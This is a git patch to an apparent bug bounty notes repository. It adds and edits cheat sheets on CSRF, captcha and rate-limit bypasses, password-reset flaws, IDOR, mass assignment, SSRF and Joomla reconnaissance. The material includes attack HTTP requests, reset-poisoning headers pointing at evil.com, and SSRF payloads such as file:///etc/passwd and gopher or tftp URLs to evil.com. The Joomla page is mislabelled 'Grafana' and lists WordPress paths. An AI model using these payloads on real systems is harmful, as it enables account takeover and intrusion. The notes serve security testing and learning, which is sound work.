From 5ac45ada2bdb15daf62e93f8bdcdcf6fd224c58c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 9 Jul 2022 22:35:32 +0700 Subject: [PATCH] Added Joomla and SSRF, and doing some major changes --- Arbitrary File Upload.md | 10 +- Bypass/Bypass 429.md | 16 +- Bypass/Bypass CSRF.md | 28 ++-- Bypass/Bypass Captcha.md | 16 +- .../Forgot Password.md | 85 +++++++---- Cross Site Request Forgery.md | 53 ++++++- Cross Site Scripting.md | 6 +- Denial Of Service.md | 17 ++- Host Header Injection.md | 12 +- Insecure Direct Object References.md | 140 ++++++++++++------ Misc/Mass Assignment.md => Mass Assignment.md | 15 +- Misc/Account Takeover.md | 12 +- Misc/Broken Link Hijacking.md | 1 + Misc/Default Credentials | 0 README.md | 10 +- {Recon => Reconnaissance}/Github Dorks.md | 0 {Recon => Reconnaissance}/Google Dorks.md | 0 {Recon => Reconnaissance}/Scope.md | 0 {Recon => Reconnaissance}/Shodan Dorks.md | 0 Server Side Request Forgery.md | 106 +++++++++++++ Technologies/Joomla.md | 43 ++++++ 21 files changed, 435 insertions(+), 135 deletions(-) rename Misc/Password Reset Flaws.md => Checklist/Forgot Password.md (60%) rename Misc/Mass Assignment.md => Mass Assignment.md (67%) create mode 100644 Misc/Default Credentials rename {Recon => Reconnaissance}/Github Dorks.md (100%) rename {Recon => Reconnaissance}/Google Dorks.md (100%) rename {Recon => Reconnaissance}/Scope.md (100%) rename {Recon => Reconnaissance}/Shodan Dorks.md (100%) create mode 100644 Server Side Request Forgery.md create mode 100644 Technologies/Joomla.md diff --git a/Arbitrary File Upload.md b/Arbitrary File Upload.md index 8d247dc..ad4cc16 100644 --- a/Arbitrary File Upload.md +++ b/Arbitrary File Upload.md @@ -11,7 +11,7 @@ In upload file feature, for example upload photo profile feature ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" @@ -21,7 +21,7 @@ Change the Content-Type ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" @@ -32,7 +32,7 @@ Content-Type: image/jpeg ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg" @@ -42,7 +42,7 @@ Change the request to this ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" @@ -53,7 +53,7 @@ Content-Type: application/x-php ``` POST /images/upload/ HTTP/1.1 Host: target.com -[...] +... ---------------------------829348923824 Content-Disposition: form-data; name="uploaded"; filename="dapos.php" diff --git a/Bypass/Bypass 429.md b/Bypass/Bypass 429.md index 3444abc..2209ad2 100644 --- a/Bypass/Bypass 429.md +++ b/Bypass/Bypass 429.md @@ -14,7 +14,7 @@ For example: POST /ForgotPass.php HTTP/1.1 Host: target.com X-Forwarded-For : 127.0.0.1 -[...] +... email=victim@gmail.com ``` @@ -23,7 +23,7 @@ email=victim@gmail.com ``` POST /ForgotPass.php HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com%00 ``` @@ -33,7 +33,7 @@ email=victim@gmail.com%00 POST /ForgotPass.php HTTP/1.1 Host: target.com Cookie: xxxxxxxxxx -[...] +... email=victim@gmail.com ``` @@ -42,7 +42,7 @@ Try this to bypass POST /ForgotPass.php HTTP/1.1 Host: target.com Cookie: aaaaaaaaaaaaa -[...] +... email=victim@gmail.com ``` @@ -51,7 +51,7 @@ email=victim@gmail.com ``` POST /ForgotPass.php HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com ``` @@ -59,7 +59,7 @@ Try this to bypass ``` POST /ForgotPass.php?random HTTP/1.1 Host: target.com -[...] +... email=victim@gmail.com ``` @@ -68,7 +68,7 @@ email=victim@gmail.com ``` POST /api/forgotpass HTTP/1.1 Host: target.com -[...] +... {"email":"victim@gmail.com"} ``` @@ -76,7 +76,7 @@ Try this to bypass ``` POST /api/forgotpass HTTP/1.1 Host: target.com -[...] +... {"email":"victim@gmail.com "} ``` diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md index 2cc165f..f6bde6b 100644 --- a/Bypass/Bypass CSRF.md +++ b/Bypass/Bypass CSRF.md @@ -4,7 +4,7 @@ ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -12,7 +12,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab ``` @@ -21,7 +21,7 @@ username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -29,7 +29,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token= ``` @@ -38,7 +38,7 @@ username=dapos&password=123456&token= ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaa ``` @@ -46,7 +46,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaabaa ``` @@ -54,7 +54,7 @@ username=dapos&password=123456&token=aaabaa ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -62,14 +62,14 @@ Try this to bypass ``` GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 Host: target.com -[...] +... ``` 5. Remove the token from request ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa ``` @@ -77,7 +77,7 @@ Try this to bypass ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456 ``` @@ -86,7 +86,7 @@ username=dapos&password=123456 ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=ANOTHER_VALID_TOKEN ``` @@ -95,7 +95,7 @@ username=dapos&password=123456&token=ANOTHER_VALID_TOKEN ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=MTIzNDU2 ``` @@ -105,7 +105,7 @@ MTIzNDU2 => 123456 with base64 ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=vi802jg9f8akd9j123 ``` @@ -113,7 +113,7 @@ When we register again, the request like this ``` POST /register HTTP/1.1 Host: target.com -[...] +... username=dapos&password=123456&token=vi802jg9f8akd9j124 ``` diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index e2dbfc3..dc6849f 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -4,7 +4,7 @@ ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` @@ -13,14 +13,14 @@ Change the method to GET ``` GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1 Host: target.com -[...] +... ``` 2. Try remove the value of the captcha parameter ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=&_Username=daffa&_Password=test123 ``` @@ -29,7 +29,7 @@ _RequestVerificationToken=&_Username=daffa&_Password=test123 ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 ``` @@ -38,7 +38,7 @@ _RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123 ``` POST / HTTP 1.1 Host: target.com -[...] +... {"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"} ``` @@ -46,7 +46,7 @@ Convert to normal request ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` @@ -63,7 +63,7 @@ X-Remote-Addr: 127.0.0.1 ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 ``` @@ -71,7 +71,7 @@ Try this to bypass ``` POST / HTTP 1.1 Host: target.com -[...] +... _RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123 ``` diff --git a/Misc/Password Reset Flaws.md b/Checklist/Forgot Password.md similarity index 60% rename from Misc/Password Reset Flaws.md rename to Checklist/Forgot Password.md index 32dfb66..5cd1820 100644 --- a/Misc/Password Reset Flaws.md +++ b/Checklist/Forgot Password.md @@ -1,86 +1,109 @@ -## Password Reset Flaws +## Forgot Password Functionality ## Introduction -Common security flaws in password reset functionality +Some common bugs in the forgot password / reset password functionality ## How to exploit -1. Parameter pollution in reset password +1. Parameter pollution ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com&email=hacker@mail.com ``` 2. Bruteforce the OTP code ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com&code=$123456$ ``` 3. Host header Injection ``` -POST /reset -Host: evil.com -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com ``` +to ``` -POST /reset +POST /reset HTTP/1.1 Host: target.com X-Forwarded-Host: evil.com -[...] +... + email=victim@mail.com ``` And the victim will receive the reset link with evil.com 4. Using separator in value of the parameter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com,hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%20hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com|hacker@mail.com ``` ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%00hacker@mail.com ``` 5. No domain in value of the paramter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim ``` 6. No TLD in value of the parameter ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail ``` 7. Using carbon copy ``` -POST /reset -[...] +POST /reset HTTP/1.1 +Host: target.com +... + email=victim@mail.com%0a%0dcc:hacker@mail.com ``` 8. If there is JSON data in body requests, add comma ``` -POST /newaccount -[...] +POST /newaccount HTTP/1.1 +Host: target.com +... + {"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"} ``` @@ -90,6 +113,12 @@ POST /newaccount - Generated based on the email of the user - Generated based on the name of the user +10. Try Cross-Site Scripting (XSS) in the form + +Sometimes the email is reflected in the forgot password page, try to use XSS payload +``` +""@gmail.com +``` ## References * [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) * [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414) \ No newline at end of file diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index dd458c4..2fcdafe 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -3,7 +3,7 @@ ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated -## How to find +## Where to find Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) ## How to exploit @@ -43,4 +43,53 @@ xhr.send('{"role":admin}'); ``` 5. Multipart request -Soon \ No newline at end of file +```html + + Multipart CSRF PoC + + +
+
+

Click Submit request


+ +
+ +
+
+ +``` \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index cbccd0d..1109185 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -236,7 +236,7 @@ ${alert(1)} 'onload=alert(1)>'onload="/* victim@mail.com -9. If the website using graphql, try to find IDOR using graphql! +9. If the website using GraphQL, try to find IDOR using GraphQL ``` -GET /graphql -[...] +GET /graphql HTTP/1.1 +Host: example.com +... ``` ``` -GET /graphql.php?query= -[...] +GET /graphql.php?query= HTTP/1.1 +Host: example.com +... ``` 10. MFLAC (Missing Function Level Access Control) ``` -GET /admin/profile +GET /admin/profile HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -GET /ADMIN/profile +GET /ADMIN/profile HTTP/1.1 +Host: example.com +... ``` 11. Try to swap uuid with number ``` -GET /file?id=90ri2-xozifke-29ikedaw0d +GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` GET /file?id=302 +Host: example.com +... ``` 12. Change HTTP Method ``` -GET /api/v1/users/profile/111 +GET /api/v1/users/profile/111 HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -POST /api/v1/users/profile/111 +POST /api/v1/users/profile/111 HTTP/1.1 +Host: example.com +... ``` 13. Path traversal ``` -GET /api/v1/users/profile/victim_id +GET /api/v1/users/profile/victim_id HTTP/1.1 +Host: example.com +... ``` Try this to bypass ``` -GET /api/v1/users/profile/my_id/../victim_id +GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1 +Host: example.com +... ``` -14. Change request content type +14. Change request `Content-Type` ``` +GET /api/v1/users/1 HTTP/1.1 +Host: example.com Content-type: application/xml ``` Try this to bypass ``` +GET /api/v1/users/2 HTTP/1.1 +Host: example.com Content-type: application/json ``` 15. Send wildcard instead of ID ``` -GET /api/users/111 +GET /api/users/111 HTTP/1.1 +Host: example.com ``` Try this to bypass ``` -GET /api/users/* +GET /api/users/* HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/% HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/_ HTTP/1.1 +Host: example.com +``` +``` +GET /api/users/. HTTP/1.1 +Host: example.com ``` - 16. Try google dorking to find new endpoint ## References diff --git a/Misc/Mass Assignment.md b/Mass Assignment.md similarity index 67% rename from Misc/Mass Assignment.md rename to Mass Assignment.md index 5522e46..d5cf279 100644 --- a/Misc/Mass Assignment.md +++ b/Mass Assignment.md @@ -6,22 +6,25 @@ Occurs when an app allows a user to manually add parameters in an HTTP Request & ## How to exploit - Normal request ``` -POST /editdata -Host: vuln.com +POST /editdata HTTP/1.1 +Host: target.com +... username=daffa ``` +The response ``` HTTP/1.1 200 OK ... -username=daffa&admin=false +{"status":"success","username":"daffainfo","isAdmin":"false"} ``` - Modified Request ``` -POST /editdata -Host: vuln.com +POST /editdata HTTP/1.1 +Host: target.com +... username=daffa&admin=true ``` @@ -30,7 +33,7 @@ username=daffa&admin=true HTTP/1.1 200 OK ... -username=daffa&admin=true +{"status":"success","username":"daffainfo","isAdmin":"true"} ``` ## References diff --git a/Misc/Account Takeover.md b/Misc/Account Takeover.md index 38977b1..ff2788f 100644 --- a/Misc/Account Takeover.md +++ b/Misc/Account Takeover.md @@ -12,14 +12,14 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga 2. Try re-sign up using same email ``` - POST /newaccount - [...] + POST /newaccount HTTP/1.1 + ... email=victim@mail.com&password=1234 ``` After sign up using victim email, try signup again but using different password ``` - POST /newaccount - [...] + POST /newaccount HTTP/1.1 + ... email=victim@mail.com&password=hacked ``` @@ -41,9 +41,9 @@ Account Takeover (known as ATO) is a type of identity theft where a bad actor ga 4. Chaining with IDOR, for example ``` - POST /changepassword.php + POST /changepassword.php HTTP/1.1 Host: site.com - [...] + ... userid=500&password=heked123 ``` 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md index 901d986..11b52a0 100644 --- a/Misc/Broken Link Hijacking.md +++ b/Misc/Broken Link Hijacking.md @@ -9,6 +9,7 @@ Broken Link Hijacking exists whenever a target links to an expired domain or pag ## Tools - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) +- [Check My Links](https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf/related) ## References - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) diff --git a/Misc/Default Credentials b/Misc/Default Credentials new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md index 2d4d248..dd4b09a 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty) ![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty) -## List +## List Vulnerability - [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [CRLF Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CRLF%20Injection.md) @@ -17,6 +17,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md) +- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md) - [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md) - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md) - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md) @@ -24,6 +25,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - SQL Injection (SOON) - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md) +## Checklist +- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md) +- Register Functionality SOON! + ## List Bypass - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md) @@ -38,8 +43,6 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Default Credentials](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Default%20Credentials.md) - [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md) - [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md) -- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md) -- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md) - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies @@ -48,6 +51,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) - [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) +- [Joomla](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Joomla.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) - [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md) diff --git a/Recon/Github Dorks.md b/Reconnaissance/Github Dorks.md similarity index 100% rename from Recon/Github Dorks.md rename to Reconnaissance/Github Dorks.md diff --git a/Recon/Google Dorks.md b/Reconnaissance/Google Dorks.md similarity index 100% rename from Recon/Google Dorks.md rename to Reconnaissance/Google Dorks.md diff --git a/Recon/Scope.md b/Reconnaissance/Scope.md similarity index 100% rename from Recon/Scope.md rename to Reconnaissance/Scope.md diff --git a/Recon/Shodan Dorks.md b/Reconnaissance/Shodan Dorks.md similarity index 100% rename from Recon/Shodan Dorks.md rename to Reconnaissance/Shodan Dorks.md diff --git a/Server Side Request Forgery.md b/Server Side Request Forgery.md new file mode 100644 index 0000000..f7431b9 --- /dev/null +++ b/Server Side Request Forgery.md @@ -0,0 +1,106 @@ +# Server Side Request Forgery (SSRF) + +## Introduction +Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server + +## Where to find +Usually it can be found in the request that contain request to another url, for example like this +``` +POST /api/check/products HTTP/1.1 +Host: example.com +Content-Type: application/x-www-form-urlencoded +Origin: https://example.com +Referer: https://example.com + +urlApi=http://192.168.1.1%2fapi%2f&id=1 +``` + +or + +``` +GET /image?url=http://192.168.1.1/ +Host: example.com +``` + +## How to exploit +1. Basic payload +``` +http://127.0.0.1:1337 +http://localhost:1337 +``` + +2. Hex encoding +``` +http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1 +``` + +3. Octal encoding +``` +http://127.0.0.1 -> http://0177.0.0.01 +``` + +4. Dword encoding +``` +http://127.0.0.1 -> http://2130706433 +``` + +5. Mixed encoding +``` +http://127.0.0.1 -> http://0177.0.0.0x1 +``` + +6. Using URL encoding +``` +http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74 +``` + +7. Using IPv6 +``` +http://0000::1:1337/ +http://[::]:1337/ +``` + +8. Using bubble text +``` +http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ + +Use this https://capitalizemytitle.com/bubble-text-generator/ +``` + +## How to exploit (URI Scheme) +1. File scheme +``` +file:///etc/passwd +``` + +2. Dict scheme +``` +dict://127.0.0.1:1337/ +``` + +3. FTP scheme +``` +ftp://127.0.0.1/ +``` + +4. TFTP scheme +``` +tftp://evil.com:1337/test +``` + +5. SFTP scheme +``` +sftp://evil.com:1337/test +`` + +6. LDAP scheme +``` +ldap://127.0.0.1:1337/ +``` + +7. Gopher scheme +``` +gopher://evil.com/_Test%0ASSRF +``` +## References +* [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b) \ No newline at end of file diff --git a/Technologies/Joomla.md b/Technologies/Joomla.md new file mode 100644 index 0000000..5a6a4ff --- /dev/null +++ b/Technologies/Joomla.md @@ -0,0 +1,43 @@ +# Grafana + +## Introduction +What would you do if you came across a website that uses Joomla ? + +## How to Detect +Try to HTTP request to `https://example.com/` and if you see the source code, you will see something like this `` + +1. Find the related CVE by checking the core, plugins, and theme version +* How to find the joomla version +``` +https://target.com/administrator/manifests/files/joomla.xml +``` + +* How to find the joomla plugin version +``` +https://target.com/administrator/components/com_NAMEPLUGIN/NAMEPLUGIN.xml + +for example + +https://target.com/administrator/components/com_contact/contact.xml +``` + +> or change NAMEPLUGIN.xml to `changelog.txt` or `readme.md` or `readme.txt` + +* How to find the theme version +``` +https://target.com/wp-content/themes/THEMENAME/style.css +https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) +``` +If you found outdated core / plugins, find the exploit at https://exploit-db.com + +2. Joomla! Config Dist File +``` +https://example.com/configuration.php-dist +``` +3. Database File List +``` +https://example.com/libraries/joomla/database/ +``` + +## References +- [Exploit-db #6377](https://www.exploit-db.com/ghdb/6377) \ No newline at end of file